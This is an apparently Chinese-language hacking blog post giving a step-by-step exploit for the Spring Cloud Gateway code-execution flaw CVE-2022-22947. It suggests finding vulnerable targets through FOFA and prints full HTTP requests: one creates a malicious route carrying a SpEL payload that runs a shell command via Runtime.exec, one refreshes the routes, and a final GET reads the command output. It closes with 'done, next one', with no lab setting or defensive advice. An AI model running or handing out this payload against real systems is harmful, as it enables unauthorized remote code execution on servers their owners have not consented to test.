安全学又学不会,只能送送外卖补贴家用这样子
Spring依旧在发力,今年三月份爆出的CVE-2022-22947代码执行漏洞又要杀疯了,fofa上一搜一个准(滑稽)
一、信息收集
还是用到老朋友脚本扫一扫,看看目标网页是否存在Spring Boot信息泄露问题
首先要抓包在/actuator/gateway/routes目录下抓包创建一条包含恶意请求的路由信息,放到Repeater。这里只能做参考,实操根据环境改变,例如可能要添加content-type,名称可以自己自由发挥,这里我用了test。
POST /actuator/gateway/routes/test HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 309
{
"id": "test",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
如果能够正常创建,服务器要给回一个201状态的包,如果返回如图上的状态,证明创建成功,就可以进行下一步
创建成功后,可以简单理解成,我们的构造的恶意代码已经躺在对方的服务器上,只需要你去刷新,并且去访问该页面就可以触发我们的恶意代码,以下代码和刚才创建路由的基本一致,只需要修改POST请求的页面,改成/actuaor/gateway/refresh,刷新信息
POST /actuator/gateway/refresh HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 309
{
"id": "test",
"filters": [{
"name": "AddResponseHeader",
"args": {
"name": "Result",
"value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"ls\"}).getInputStream()))}"
}
}],
"uri": "http://example.com"
}
最后直接GET访问我们刚才创建好的路由,hostname:port/actuator/gateway/routes/创建路由的名称(我这里用的是test)
完毕,下一个